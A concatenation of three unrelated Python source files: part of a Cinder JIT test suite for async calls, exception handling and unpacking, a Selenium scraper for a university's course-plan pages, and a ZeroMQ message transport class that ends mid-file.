async def _vector_call_awaited(self, t):
await t()
@unittest.failUnlessJITCompiled
async def _vector_call_kw(self, t):
t(a=1)
@unittest.failUnlessJITCompiled
async def _vector_call_kw_awaited(self, t):
await t(a=1)
def test_call_ex(self):
self._assert_awaited_flag_not_seen(self._call_ex)
def test_call_ex_awaited(self):
self._assert_awaited_flag_seen(self._call_ex_awaited)
def test_call_ex_kw(self):
self._assert_awaited_flag_not_seen(self._call_ex_kw)
def test_call_ex_kw_awaited(self):
self._assert_awaited_flag_seen(self._call_ex_kw_awaited)
def test_call_method(self):
self._assert_awaited_flag_not_seen(self._call_method)
def test_call_method_awaited(self):
self._assert_awaited_flag_seen(self._call_method_awaited)
def test_vector_call(self):
self._assert_awaited_flag_not_seen(self._vector_call)
def test_vector_call_awaited(self):
self._assert_awaited_flag_seen(self._vector_call_awaited)
def test_vector_call_kw(self):
self._assert_awaited_flag_not_seen(self._vector_call_kw)
def test_vector_call_kw_awaited(self):
self._assert_awaited_flag_seen(self._vector_call_kw_awaited)
def test_invoke_function(self):
codestr = f"""
def x() -> None:
pass
async def await_x() -> None:
await x()
async def call_x() -> None:
c = x()
def fixup():
import _testcapi
global x
x = _testcapi.TestAwaitedCall()
"""
c = self.compile(codestr, StaticCodeGenerator, modname="foo.py")
await_x = self.find_code(c, "await_x")
self.assertInBytecode(await_x, "INVOKE_FUNCTION", (("foo.py", "x"), 0))
call_x = self.find_code(c, "call_x")
self.assertInBytecode(call_x, "INVOKE_FUNCTION", (("foo.py", "x"), 0))
with self.in_module(codestr) as mod:
mod["fixup"]()
self.assertIsInstance(mod["x"], _testcapi.TestAwaitedCall)
self.assertIsNone(mod["x"].last_awaited())
coro = mod["await_x"]()
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(mod["x"].last_awaited())
self.assertIsNone(mod["x"].last_awaited())
coro = mod["call_x"]()
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(mod["x"].last_awaited())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(mod["await_x"]))
self.assertTrue(cinderjit.is_jit_compiled(mod["call_x"]))
def test_invoke_method(self):
codestr = f"""
class X:
def x(self) -> None:
pass
async def await_x() -> None:
await X().x()
async def call_x() -> None:
X().x()
"""
c = self.compile(codestr, StaticCodeGenerator, modname="foo.py")
await_x = self.find_code(c, "await_x")
self.assertInBytecode(await_x, "INVOKE_METHOD", (("foo.py", "X", "x"), 0))
call_x = self.find_code(c, "call_x")
self.assertInBytecode(call_x, "INVOKE_METHOD", (("foo.py", "X", "x"), 0))
with self.in_module(codestr) as mod:
awaited_capturer = mod["X"].x = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = mod["await_x"]()
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
coro = mod["call_x"]()
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(awaited_capturer.last_awaited())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(mod["await_x"]))
self.assertTrue(cinderjit.is_jit_compiled(mod["call_x"]))
async def y():
await DummyAwaitable()
def test_async_yielding(self):
class DummyAwaitable:
def __await__(self):
return iter([1, 2])
coro = self._vector_call_awaited(DummyAwaitable)
self.assertEqual(coro.send(None), 1)
self.assertEqual(coro.send(None), 2)
class AsyncGeneratorsTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
async def _f1(self, awaitable):
x = yield 1
yield x
await awaitable
def test_basic_coroutine(self):
class DummyAwaitable:
def __await__(self):
return iter([3])
async_gen = self._f1(DummyAwaitable())
# Step 1: move through "yield 1"
async_itt1 = async_gen.asend(None)
with self.assertRaises(StopIteration) as exc:
async_itt1.send(None)
self.assertEqual(exc.exception.value, 1)
# Step 2: send in and receive out 2 via "yield x"
async_itt2 = async_gen.asend(2)
with self.assertRaises(StopIteration) as exc:
async_itt2.send(None)
self.assertEqual(exc.exception.value, 2)
# Step 3: yield of "3" from DummyAwaitable
async_itt3 = async_gen.asend(None)
self.assertEqual(async_itt3.send(None), 3)
# Step 4: complete
with self.assertRaises(StopAsyncIteration):
async_itt3.send(None)
@unittest.failUnlessJITCompiled
async def _f2(self, asyncgen):
res = []
async for x in asyncgen:
res.append(x)
return res
def test_for_iteration(self):
async def asyncgen():
yield 1
yield 2
self.assertEqual(asyncio.run(self._f2(asyncgen())), [1, 2])
def _assertExceptionFlowsThroughYieldFrom(self, exc):
tb_prev = None
tb = exc.__traceback__
while tb.tb_next:
tb_prev = tb
tb = tb.tb_next
instrs = [x for x in dis.get_instructions(tb_prev.tb_frame.f_code)]
self.assertEqual(instrs[tb_prev.tb_lasti // 2].opname, "YIELD_FROM")
def test_for_exception(self):
async def asyncgen():
yield 1
raise ValueError
# Can't use self.assertRaises() as this clears exception tracebacks
try:
asyncio.run(self._f2(asyncgen()))
except ValueError as e:
self._assertExceptionFlowsThroughYieldFrom(e)
else:
self.fail("Expected ValueError to be raised")
@unittest.failUnlessJITCompiled
async def _f3(self, asyncgen):
return [x async for x in asyncgen]
def test_comprehension(self):
async def asyncgen():
yield 1
yield 2
self.assertEqual(asyncio.run(self._f3(asyncgen())), [1, 2])
def test_comprehension_exception(self):
async def asyncgen():
yield 1
raise ValueError
# Can't use self.assertRaises() as this clears exception tracebacks
try:
asyncio.run(self._f3(asyncgen()))
except ValueError as e:
self._assertExceptionFlowsThroughYieldFrom(e)
else:
self.fail("Expected ValueError to be raised")
class Err1(Exception):
pass
class Err2(Exception):
pass
class ExceptionHandlingTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def try_except(self, func):
try:
func()
except:
return True
return False
def test_raise_and_catch(self):
def f():
raise Exception("hello")
self.assertTrue(self.try_except(f))
def g():
pass
self.assertFalse(self.try_except(g))
@unittest.failUnlessJITCompiled
def catch_multiple(self, func):
try:
func()
except Err1:
return 1
except Err2:
return 2
def test_multiple_except_blocks(self):
def f():
raise Err1("err1")
self.assertEqual(self.catch_multiple(f), 1)
def g():
raise Err2("err2")
self.assertEqual(self.catch_multiple(g), 2)
@unittest.failUnlessJITCompiled
def reraise(self, func):
try:
func()
except:
raise
def test_reraise(self):
def f():
raise Exception("hello")
with self.assertRaisesRegex(Exception, "hello"):
self.reraise(f)
@unittest.failUnlessJITCompiled
def try_except_in_loop(self, niters, f):
for i in range(niters):
try:
try:
f(i)
except Err2:
pass
except Err1:
break
return i
def test_try_except_in_loop(self):
def f(i):
if i == 10:
raise Err1("hello")
self.assertEqual(self.try_except_in_loop(20, f), 10)
@unittest.failUnlessJITCompiled
def nested_try_except(self, f):
try:
try:
try:
f()
except:
raise
except:
raise
except:
return 100
def test_nested_try_except(self):
def f():
raise Exception("hello")
self.assertEqual(self.nested_try_except(f), 100)
@unittest.failUnlessJITCompiled
def try_except_in_generator(self, f):
try:
yield f(0)
yield f(1)
yield f(2)
except:
yield 123
def test_except_in_generator(self):
def f(i):
if i == 1:
raise Exception("hello")
return
g = self.try_except_in_generator(f)
next(g)
self.assertEqual(next(g), 123)
@unittest.failUnlessJITCompiled
def try_finally(self, should_raise):
result = None
try:
if should_raise:
raise Exception("testing 123")
finally:
result = 100
return result
def test_try_finally(self):
self.assertEqual(self.try_finally(False), 100)
with self.assertRaisesRegex(Exception, "testing 123"):
self.try_finally(True)
@unittest.failUnlessJITCompiled
def try_except_finally(self, should_raise):
result = None
try:
if should_raise:
raise Exception("testing 123")
except Exception:
result = 200
finally:
if result is None:
result = 100
return result
def test_try_except_finally(self):
self.assertEqual(self.try_except_finally(False), 100)
self.assertEqual(self.try_except_finally(True), 200)
@unittest.failUnlessJITCompiled
def return_in_finally(self, v):
try:
pass
finally:
return v
@unittest.failUnlessJITCompiled
def return_in_finally2(self, v):
try:
return v
finally:
return 100
@unittest.failUnlessJITCompiled
def return_in_finally3(self, v):
try:
1 / 0
finally:
return v
@unittest.failUnlessJITCompiled
def return_in_finally4(self, v):
try:
return 100
finally:
try:
1 / 0
finally:
return v
def test_return_in_finally(self):
self.assertEqual(self.return_in_finally(100), 100)
self.assertEqual(self.return_in_finally2(200), 100)
self.assertEqual(self.return_in_finally3(300), 300)
self.assertEqual(self.return_in_finally4(400), 400)
@unittest.failUnlessJITCompiled
def break_in_finally_after_return(self, x):
for count in [0, 1]:
count2 = 0
while count2 < 20:
count2 += 10
try:
return count + count2
finally:
if x:
break
return "end", count, count2
@unittest.failUnlessJITCompiled
def break_in_finally_after_return2(self, x):
for count in [0, 1]:
for count2 in [10, 20]:
try:
return count + count2
finally:
if x:
break
return "end", count, count2
def test_break_in_finally_after_return(self):
self.assertEqual(self.break_in_finally_after_return(False), 10)
self.assertEqual(self.break_in_finally_after_return(True), ("end", 1, 10))
self.assertEqual(self.break_in_finally_after_return2(False), 10)
self.assertEqual(self.break_in_finally_after_return2(True), ("end", 1, 10))
@unittest.failUnlessJITCompiled
def continue_in_finally_after_return(self, x):
count = 0
while count < 100:
count += 1
try:
return count
finally:
if x:
continue
return "end", count
@unittest.failUnlessJITCompiled
def continue_in_finally_after_return2(self, x):
for count in [0, 1]:
try:
return count
finally:
if x:
continue
return "end", count
def test_continue_in_finally_after_return(self):
self.assertEqual(self.continue_in_finally_after_return(False), 1)
self.assertEqual(self.continue_in_finally_after_return(True), ("end", 100))
self.assertEqual(self.continue_in_finally_after_return2(False), 0)
self.assertEqual(self.continue_in_finally_after_return2(True), ("end", 1))
@unittest.failUnlessJITCompiled
def return_in_loop_in_finally(self, x):
try:
for _ in [1, 2, 3]:
if x:
return x
finally:
pass
return 100
def test_return_in_loop_in_finally(self):
self.assertEqual(self.return_in_loop_in_finally(True), True)
self.assertEqual(self.return_in_loop_in_finally(False), 100)
@unittest.failUnlessJITCompiled
def conditional_return_in_finally(self, x, y, z):
try:
if x:
return x
if y:
return y
finally:
pass
return z
def test_conditional_return_in_finally(self):
self.assertEqual(self.conditional_return_in_finally(100, False, False), 100)
self.assertEqual(self.conditional_return_in_finally(False, 200, False), 200)
self.assertEqual(self.conditional_return_in_finally(False, False, 300), 300)
@unittest.failUnlessJITCompiled
def nested_finally(self, x):
try:
if x:
return x
finally:
try:
y = 10
finally:
z = y
return z
def test_nested_finally(self):
self.assertEqual(self.nested_finally(100), 100)
self.assertEqual(self.nested_finally(False), 10)
class UnpackSequenceTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _unpack_arg(self, seq, which):
a, b, c, d = seq
if which == "a":
return a
if which == "b":
return b
if which == "c":
return c
return d
@unittest.failUnlessJITCompiled
def _unpack_ex_arg(self, seq, which):
a, b, *c, d = seq
if which == "a":
return a
if which == "b":
return b
if which == "c":
return c
return d
def test_unpack_tuple(self):
self.assertEqual(self._unpack_arg(("eh", "bee", "see", "dee"), "b"), "bee")
self.assertEqual(self._unpack_arg((3, 2, 1, 0), "c"), 1)
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_tuple_wrong_size(self):
with self.assertRaises(ValueError):
self._unpack_arg((1, 2, 3, 4, 5), "a")
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_list(self):
self.assertEqual(self._unpack_arg(["one", "two", "three", "four"], "a"), "one")
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_gen(self):
def gen():
yield "first"
yield "second"
yield "third"
yield "fourth"
self.assertEqual(self._unpack_arg(gen(), "d"), "fourth")
@unittest.failUnlessJITCompiled
def _unpack_not_iterable(self):
(a, b, *c) = 1
@unittest.failUnlessJITCompiled
def _unpack_insufficient_values(self):
(a, b, *c) = [1]
@unittest.failUnlessJITCompiled
def _unpack_insufficient_values_after(self):
(a, *b, c, d) = [1, 2]
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_ex(self):
with self.assertRaises(TypeError):
self._unpack_not_iterable()
with self.assertRaises(ValueError):
self._unpack_insufficient_values()
with self.assertRaises(ValueError):
self._unpack_insufficient_values_after()
seq = [1, 2, 3, 4, 5, 6]
self.assertEqual(self._unpack_ex_arg(seq, "a"), 1)
self.assertEqual(self._unpack_ex_arg(seq, "b"), 2)
self.assertEqual(self._unpack_ex_arg(seq, "c"), [3, 4, 5])
self.assertEqual(self._unpack_ex_arg(seq, "d"), 6)
class DeleteSubscrTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _delit(self, container, key):
del container[key]
def test_builtin_types(self):
l = [1, 2, 3]
self._delit(l, 1)
self.assertEqual(l, [1, 3])
d = {"foo": 1, "bar": 2}
self._delit(d, "foo")
self.assertEqual(d, {"bar": 2})
def test_custom_type(self):
class CustomContainer:
def __init__(self):
self.item = None
def __delitem__(self, item):
self.item = item
c = CustomContainer()
self._delit(c, "foo")
self.assertEqual(c.item, "foo")
def test_missing_key(self):
d = {"foo": 1}
with self.assertRaises(KeyError):
self._delit(d, "bar")
def test_custom_error(self):
class CustomContainer:
def __delitem__(self, item):
raise Exception("testing 123")
c = CustomContainer()
with self.assertRaisesRegex(Exception, "testing 123"):
self._delit(c, "foo")
class DeleteFastTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _del(self):
x = 2
del x
@unittest.failUnlessJITCompiled
def _del_arg(self, a):
del a
@unittest.failUnlessJITCompiled
def _del_and_raise(self):
x = 2
del x
return x
@unittest.failUnlessJITCompiled
def _del_arg_and_raise(self, a):
del a
return a
@unittest.failUnlessJITCompiled
def _del_ex_no_raise(self):
try:
return min(1, 2)
except Exception as e:
pass
@unittest.failUnlessJITCompiled
def _del_ex_raise(self):
try:
raise Exception()
except Exception as e:
pass
return e
def test_del_local(self):
self.assertEqual(self._del(), None)
def test_del_arg(self):
self.assertEqual(self._del_arg(42), None)
def test_del_and_raise(self):
with self.assertRaises(NameError):
self._del_and_raise()
def test_del_arg_and_raise(self):
with self.assertRaises(NameError):
self.assertEqual(self._del_arg_and_raise(42), None)
def test_del_ex_no_raise(self):
self.assertEqual(self._del_ex_no_raise(), 1)
def test_del_ex_raise(self):
with self.assertRaises(NameError):
self.assertEqual(self._del_ex_raise(), 42)
class KeywordOnlyArgTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def f1(self, *, val=10):
return val
@unittest.failUnlessJITCompiled
def f2(self, which, *, y=10, z=20):
if which == 0:
return y
elif which == 1:
return z
return which
@unittest.failUnlessJITCompiled
def f3(self, which, *, y, z=20):
if which == 0:
return y
elif which == 1:
return z
return which
@unittest.failUnlessJITCompiled
def f4(self, which, *, y, z=20, **kwargs):
if which == 0:
return y
elif which == 1:
return z
elif which == 2:
return kwargs
return which
def test_kwonly_arg_passed_as_positional(self):
msg = "takes 1 positional argument but 2 were given"
with self.assertRaisesRegex(TypeError, msg):
self.f1(100)
msg = "takes 2 positional arguments but 3 were given"
with self.assertRaisesRegex(TypeError, msg):
self.f3(0, 1)
def test_kwonly_args_with_kwdefaults(self):
self.assertEqual(self.f1(), 10)
self.assertEqual(self.f1(val=20), 20)
self.assertEqual(self.f2(0), 10)
self.assertEqual(self.f2(0, y=20), 20)
self.assertEqual(self.f2(1), 20)
self.assertEqual(self.f2(1, z=30), 30)
def test_kwonly_args_without_kwdefaults(self):
self.assertEqual(self.f3(0, y=10), 10)
self.assertEqual(self.f3(1, y=10), 20)
self.assertEqual(self.f3(1, y=10, z=30), 30)
def test_kwonly_args_and_varkwargs(self):
self.assertEqual(self.f4(0, y=10), 10)
self.assertEqual(self.f4(1, y=10), 20)
self.assertEqual(self.f4(1, y=10, z=30, a=40), 30)
self.assertEqual(self.f4(2, y=10, z=30, a=40, b=50), {"a": 40, "b": 50})
class ClassA:
z = 100
x = 41
def g(self, a):
return 42 + a
@classmethod
def cls_g(cls, a):
return 100 + a
class ClassB(ClassA):
def f(self, a):
return super().g(a=a)
def f_2arg(self, a):
return super(ClassB, self).g(a=a)
@classmethod
def cls_f(cls, a):
return super().cls_g(a=a)
@classmethod
def cls_f_2arg(cls, a):
return super(ClassB, cls).cls_g(a=a)
@property
def x(self):
return super().x + 1
@property
def x_2arg(self):
return super(ClassB, self).x + 1
class SuperAccessTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_super_method(self):
self.assertEqual(ClassB().f(1), 43)
self.assertEqual(ClassB().f_2arg(1), 43)
self.assertEqual(ClassB.cls_f(99), 199)
self.assertEqual(ClassB.cls_f_2arg(99), 199)
@unittest.failUnlessJITCompiled
def test_super_method_kwarg(self):
self.assertEqual(ClassB().f(1), 43)
self.assertEqual(ClassB().f_2arg(1), 43)
self.assertEqual(ClassB.cls_f(1), 101)
self.assertEqual(ClassB.cls_f_2arg(1), 101)
@unittest.failUnlessJITCompiled
def test_super_attr(self):
self.assertEqual(ClassB().x, 42)
self.assertEqual(ClassB().x_2arg, 42)
class RegressionTests(StaticTestBase):
# Detects an issue in the backend where the Store instruction generated 32-
# bit memory writes for 64-bit constants.
def test_store_of_64bit_immediates(self):
codestr = f"""
from __static__ import int64, box
class Cint64:
def __init__(self):
self.a: int64 = 0x5555555555555555
def testfunc():
c = Cint64()
c.a = 2
return box(c.a) == 2
"""
with self.in_module(codestr) as mod:
testfunc = mod["testfunc"]
self.assertTrue(testfunc())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(testfunc))
@unittest.skipUnlessCinderJITEnabled("Requires cinderjit module")
class CinderJitModuleTests(unittest.TestCase):
def test_bad_disable(self):
with self.assertRaises(TypeError):
cinderjit.disable(1, 2)
with self.assertRaises(TypeError):
cinderjit.disable(None)
def test_jit_force_normal_frame_changes_flags(self):
def x():
pass
CO_NORMAL_FRAME = 0x20000000
self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, 0)
forced_x = cinderjit.jit_force_normal_frame(x)
self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, CO_NORMAL_FRAME)
def test_jit_force_normal_frame_raises_on_invalid_arg(self):
with self.assertRaises(TypeError):
cinderjit.jit_force_normal_frame(None)
if __name__ == "__main__":
unittest.main()
|
course_plan_scraper.py
|
from math import ceil
from scraper import Scraper
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
import threading
from driver_manager import DriverManager
from time import perf_counter
from rich import print as rprint
import requests
from bs4 import BeautifulSoup
from urllib3.exceptions import NewConnectionError
class CoursePlanScraper(Scraper):
MAX_FACULTY_THREADS = 4
def generate_dropdown_options_faculty(self, driver):
# Check if the dropdown is already expanded.
dropdown = driver.find_elements(By.TAG_NAME, "button")[0]
if dropdown.get_attribute("aria-expanded") == "true":
return
# Clicking this generates dropdown options.
driver.find_elements(
By.CLASS_NAME, "filter-option-inner-inner")[0].click()
self.wait()
def generate_dropdown_options_program(self, driver):
# Check if the dropdown is already expanded.
dropdown = driver.find_elements(By.TAG_NAME, "button")[1]
if dropdown.get_attribute("aria-expanded") == "true":
return
# Clicking this generates dropdown options.
driver.find_elements(
By.CLASS_NAME, "filter-option-inner-inner")[1].click()
self.wait()
def get_submit_button(self):
return self.find_elements_by_class("button")[0]
def scrape_program(self, url):
soup = self.get_soup_from_url(url)
program_list = []
tables = soup.find_all("table", {"class": "table-responsive"})
for table in tables:
semester_program = []
# First row is just the header.
rows = table.find_all("tr")[1:]
for row in rows:
cells = row.find_all("td")
# If the course is selective.
a = cells[1].find("a")
if a is not None:
selective_courses_url = url.replace(
url.split("/")[-1], a["href"])
selective_courses_title = a.get_text()
selective_soup = self.get_soup_from_url(
selective_courses_url)
selective_courses = []
selective_course_table = selective_soup.find(
"table", {"class": "table-responsive"})
if selective_course_table is not None:
selective_course_rows = selective_course_table.find_all(
"tr")
# First row is just the header.
for selective_row in selective_course_rows[1:]:
selective_courses.append(
selective_row.find("a").get_text())
semester_program.append(
{selective_courses_title: selective_courses})
else:
# TODO: Add support for selective courses like this:
# https://www.sis.itu.edu.tr/TR/ogrenci/lisans/ders-planlari/plan/MAK/20031081.html
semester_program.append(
{selective_courses_title: []})
else:
course_code = cells[0].find("a").get_text()
semester_program.append(course_code)
program_list.append(semester_program)
return program_list
def get_soup_from_url(self, url):
try:
page = requests.get(url)
soup = BeautifulSoup(page.content, "html.parser")
return soup
except NewConnectionError:
rprint(f"[bold red]Failed to load the url {url}, trying again...")
self.wait()
return self.get_soup_from_url(url)
def scrap_programs(self, program_name, url):
program_iterations = dict()
soup = self.get_soup_from_url(url)
# Cache the urls for the program iterations.
for a in soup.find_all("a"):
iteration_url = a["href"]
inner_part = a.get_text()
if ".html" in iteration_url:
program_iterations[inner_part] = url + iteration_url
def scrap_program_and_save(key, url):
try:
program_iterations[key] = self.scrape_program(url)
except Exception as e:
rprint(
f"[bold red]The following error was thrown while scraping a program iteration of [cyan]\"{program_name}\"[bold red]:\n\n{e}")
self.wait()
scrap_program_and_save(key, url)
for program_iteration, url in program_iterations.items():
scrap_program_and_save(program_iteration, url)
return program_iterations
def scrap_course_plan(self, i, url):
driver = DriverManager.create_driver()
driver.get(url)
def get_faculty_dropdown_options():
self.generate_dropdown_options_faculty(driver)
return driver.find_elements(By.TAG_NAME, "li")[69:]
faculty_dropdown_option = get_faculty_dropdown_options()[i]
faculty = self.get_dropdown_option_if_available(
faculty_dropdown_option)
if faculty is None:
driver.quit()
return
faculty_name = faculty_dropdown_option.find_element(
By.TAG_NAME, "span").get_attribute("innerHTML")
ActionChains(driver).move_to_element(
faculty).click(faculty).perform()
def get_program_dropdown_options():
self.generate_dropdown_options_program(driver)
return driver.find_elements(By.TAG_NAME, "li")
faculty_plans = dict()
for j in range(len(get_program_dropdown_options())):
program_dropdown_option = get_program_dropdown_options()[j]
program = self.get_dropdown_option_if_available(
program_dropdown_option)
if program is None:
continue
program_name = program_dropdown_option.find_element(
By.TAG_NAME, "span").get_attribute("innerHTML")
ActionChains(driver).move_to_element(
program).click(program).perform()
driver.find_elements(By.CLASS_NAME, "button")[0].click()
self.wait()
faculty_plans[program_name] = self.scrap_programs(
program_name, driver.current_url)
rprint(
f"[white]Finished Scraping The Program: [cyan]\"{program_name}\"[white] Under the Faculty: [bold red]\"{faculty_name}\"")
driver.back()
driver.quit()
rprint(
f"[white]Finished Scraping The Faculty: [bold red]\"{faculty_name}\"")
self.faculties[faculty_name] = faculty_plans
def scrap_course_plans(self):
def get_faculty_dropdown_options():
self.generate_dropdown_options_faculty(self.webdriver)
return self.find_elements_by_tag("li")[69:85]
faculty_order = [x.find_element(By.TAG_NAME, "span").get_attribute("innerHTML")
for x in get_faculty_dropdown_options()]
t0 = perf_counter()
self.faculties = dict()
print("====== Scraping Course Programs ======")
faculty_count = len(get_faculty_dropdown_options())
for j in range(ceil(faculty_count / self.MAX_FACULTY_THREADS)):
rprint(f"[bold green]Refreshed:[green] Faculty Threads")
threads = []
for i in range(self.MAX_FACULTY_THREADS):
current_index = i + j * self.MAX_FACULTY_THREADS
if current_index >= faculty_count:
break
threads.append(threading.Thread(
target=self.scrap_course_plan, args=(current_index, self.webdriver.current_url)))
for t in threads:
t.start()
for t in threads:
t.join()
rprint(
f"[bold green]Threads Finished:[green] Thread {0 + j * self.MAX_FACULTY_THREADS} - {(j + 1) * self.MAX_FACULTY_THREADS}")
t1 = perf_counter()
rprint(
f"Scraping Course Plans Completed in [green]{round(t1 - t0, 2)}[white] seconds.")
return self.faculties, faculty_order
|
transport.py
|
from threading import Thread, Lock, Event
from zlib import compress, decompress
import time
import zmq
from google import protobuf
from .engine_commons import getUUID, getOpenPort, baseToPubSubPort
from .message_pb2 import SocketMessage
#################
### CONSTANTS ###
#################
from .constants import DELIMITER, ACK
CONN_REQUEST = b'portplease'
BASE_PORT = 8484
################################################################
#######################
### TRANSPORT CLASS ###
#######################
# pylint: disable=too-many-instance-attributes, fixme
class Transport:
# pylint: disable=invalid-name
DIRECT = 1
SUBSCRIBER = 2
BOTH = 3
# pylint: disable=bad-continuation
def __init__(
self,
context=zmq.Context(),
# router=None,
timeout=10, # milliseconds
compression=False,
requireAcknowledgement=True,
basePort=BASE_PORT,
):
self.context = context
# self.router = router # TODO: Add plugin capability
self.timeout = timeout
self.useCompression = compression
self.requireAcknowledgement = requireAcknowledgement
self.pairRoutingPort = basePort
self.pubsubPort = baseToPubSubPort(basePort)
self._topics = {}
self._callbacks = {}
self._topicEvents = {}
self._awaitingAcknowledgement = {}
self.parseLock = Lock()
self._directConnectionsLock = Lock()
self._closeEvent = Event()
self._directConnections = {}
self._routingSocket = None
self._subscriber = None
self._publisher = None
self._pairHost = None
self.stopped = False
self.started = False
########################
### HELPER FUNCTIONS ###
########################
def _generateBoundSocket(self, socketType, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.bind('tcp://*:{}'.format(port))
return socket
def _generateConnectSocket(self, socketType, address, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.connect('tcp://{}:{}'.format(address, port))
return socket
def _ensurePublisher(self):
if self._publisher is not None:
return
# pylint: disable=no-member
self._publisher = self._generateBoundSocket(zmq.PUB, self.pubsubPort)
def _ensureSubscriber(self):
if self._subscriber is not None:
return
# pylint: disable=no-member
self._subscriber = self.context.socket(zmq.SUB)
self._subscriber.RCVTIMEO = self.timeout # in milliseconds
def _connectSubscriber(self, address, port):
# If the user specifies an override port, use that; otherwise use default
port = port or self.pubsubPort
self._subscriber.connect('tcp://{}:{}'.format(address, port))
# Returns serialized string message
def _createSocketMessage(self, topic, data, acknowledgement=False):
message = SocketMessage()
message.type = topic
message.data = data
if acknowledgement:
message.acknowledge = True
self._awaitingAcknowledgement[topic] = Event()
serialized = message.SerializeToString()
if self.useCompression:
serialized = compress(serialized)
return serialized
##########################
### CONNECTION HELPERS ###
##########################
def _directConnect(self, address, targetBasePort):
# TODO: Fix this behavior, appears (and is) fragile
if self.pairRoutingPort is None:
targetBasePort = self.pairRoutingPort
socket = self._requestNewConnection(address, targetBasePort)
uuid = getUUID()
self._directConnections[uuid] = socket
return uuid
# pylint: disable=no-member
def _requestNewConnection(self, address, port):
socket = self._generateConnectSocket(zmq.REQ, address, port)
socket.send(CONN_REQUEST)
# TODO: Better define this behavior
while True:
try:
port = socket.recv().decode()
break
except zmq.error.Again:
continue
socket.close()
return self._generateConnectSocket(zmq.PAIR, address, port)
def _handleConnectionRequests(self, address, request):
if request != CONN_REQUEST:
raise RuntimeError('Received a connection request without appropriate metadata')
openPort = getOpenPort()
self._directConnections[getUUID()] = self._generateBoundSocket(zmq.PAIR, openPort)
self._routingSocket.send_multipart(
[address, b'', '{}'.format(openPort).encode(),]
)
#####################
### MAIN RUN LOOP ###
#####################
def _run(self):
while True:
if self.stopped:
self._close()
return
try:
address, _, request = self._routingSocket.recv_multipart()
self._handleConnectionRequests(address, request)
except zmq.error.Again:
pass
for socket in list(self._directConnections.values()):
try:
message = socket.recv()
self._handleMessage(message, socket)
except zmq.error.Again:
pass
if self._subscriber:
try:
message = self._subscriber.recv()
self._handleSubscriptionMessage(message)
except zmq.error.Again:
pass
# pylint: disable=no-member
def _handleMessage(self, rawMessage, socket=None):
message = SocketMessage()
try:
message.ParseFromString(rawMessage)
except protobuf.message.DecodeError:
message.ParseFromString(decompress(rawMessage))
# TODO: Implement metadata cascade
# self._metadataCascade(message)
# Parse message topic (type)
if message.data != '':
if message.data == ACK:
if self._awaitingAcknowledgement.get(message.type, False):
self._awaitingAcknowledgement[message.type].set()
return
self._topics[message.type] = message.data
# Fire any registered callbacks
if self._callbacks.get(message.type, False):
self._callbacks[message.type](self, message.type, message.data)
# Resolve any waiting events
if self._topicEvents.get(message.type, False):
self._topicEvents[message.type].set()
# Send an acknowledgement if required
# pylint: disable=singleton-comparison
if message.acknowledge == True:
self._sendAcknowledgement(socket, message.type)
def _handleSubscriptionMessage(self, rawMessage):
# TODO: Validate this approach
self._handleMessage(rawMessage.split(DELIMITER)[1])
def _sendMessage(self, message, routingID=None):
if routingID is None:
for socket in list(self._directConnections.values()):
# TODO: This is not good, but makes things work. Invesgiate better methods.
time.sleep(0.005)
socket.send(message)
return
socket = self._directConnections[routingID]
if socket is None:
raise RuntimeError('Unable to send message to route ID; connection does not exist')
socket.send(message)
def _sendAcknowledgement(self, socket, topic):
socket.send(self._createSocketMessage(topic, ACK))
def _close(self):
self.started = False
for socket in list(self._directConnections.values()):
socket.close()
if self._publisher is not None:
self._publisher.close()
if self._subscriber is not None:
self._subscriber.close()
self._closeEvent.set()
######################
### CORE INTERFACE ###
######################
def start(self):
# Setup routing socket
# This will sometimes fail with `zmq.error.ZMQError: Permission denied`
# TODO: Add resiliance to this
self._routingSocket = self._generateBoundSocket(zmq.ROUTER, self.pairRoutingPort)
# Start thread
Thread(target=self._run, args=()).start()
self.started = True
return self
def connect(self, address, targetBasePort=None, connectionTypes=1):
if not isinstance(connectionTypes, list):
connectionTypes = [connectionTypes]
uuid = None
if Transport.DIRECT in connectionTypes:
uuid = self._directConnect(address, targetBasePort)
if Transport.SUBSCRIBER in connectionTypes:
self._ensureSubscriber()
self._connectSubscriber(address, targetBasePort)
return uuid
def publish(self, topic, data):
# Ensure publisher exists, then push messages
self._ensurePublisher()
message = self._createSocketMessage(topic, data)
self._publisher.send(topic.encode() + DELIMITER + message)
def subscribe(self, topic):
# Ensure a subscriber exists and subscribe
self._ensureSubscriber()
self._subscriber.subscribe(topic)
def send(self, topic, data, routingID=None):
self._sendMessage(
self._createSocketMessage(topic, data, self.requireAcknowledgement), routingID
)
if self.requireAcknowledgement:
self._awaitingAcknowledgement[topic].wait()
def get(self, topic):
return self._topics.get(topic, None)
def registerCallback(self, topic, function):
self._callbacks[topic] = function
def close(self):
self.stopped = True
self._closeEvent.wait()
#########################
### INTERFACE HELPERS ###
